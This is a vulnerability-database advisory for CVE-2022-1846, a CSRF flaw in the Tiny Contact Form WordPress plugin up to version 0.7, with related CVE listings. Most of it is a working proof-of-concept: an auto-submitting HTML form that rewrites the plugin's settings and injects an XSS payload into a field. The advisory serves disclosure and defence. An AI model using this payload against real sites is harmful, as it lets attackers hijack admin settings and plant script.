Lucene search
Daniel RufWPEX-ID:5FA5838E-4843-4D9C-9884-E3EBBF56FC6AHistoryMay 31, 2022 - 12:00 a.m.
Tiny Contact Form <= 0.7 - Arbitrary Settings Update via CSRF
2022-05-3100:00:00
Daniel Ruf
75
csrf
arbitrary settings update
form security
cross site request forgery
security exploit
EPSS
0.001
Percentile
25.9%
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
<form id="test" action="https://example.com/wp-admin/options-general.php?page=tiny-contact-form" method="POST">
<input type="text" name="tcf_to_email" value="hacked">
<input type="text" name="tcf_from_email" value="hacked">
<input type="text" name="tcf_msg_ok" value="">
<input type="text" name="tcf_msg_err" value="">
<input type="text" name="tcf_submit" value=''"><img src=x onerror=alert(1)>''>
<input type="text" name="tcf_subpre" value="">
<input type="text" name="tcf_field_1" value="">
<input type="text" name="tcf_field_2" value="">
<input type="text" name="tcf_field_3" value="">
<input type="text" name="tcf_field_4" value="">
<input type="text" name="tcf_field_5" value="">
<input type="text" name="tcf_captcha_label" value="">
<input type="text" name="tcf_captcha2_question" value="">
<input type="text" name="tcf_captcha2_answer" value="">
<input type="text" name="tcf_css" value="">
<input type="text" name="tcf_save" value="Änderungen speichern">
</form>
<script>
document.getElementById("test").submit();
</script>Related
cvelist
cvelist
CVE-2022-1846 Tiny Contact Form <= 0.7 - Arbitrary Settings Update via CSRF
2022-06-27 08:58:03
wpvulndb
wpvulndb
Tiny Contact Form <= 0.7 - Arbitrary Settings Update via CSRF
2022-05-31 00:00:00
cnvd
cnvd
WordPress Tiny Contact Form plugin跨站请求伪造漏洞
2022-06-30 00:00:00
prion
prion
Cross site request forgery (csrf)
2022-06-27 09:15:00
nvd
nvd
CVE-2022-1846
2022-06-27 09:15:09
cve
cve
CVE-2022-1846
2022-06-27 09:15:09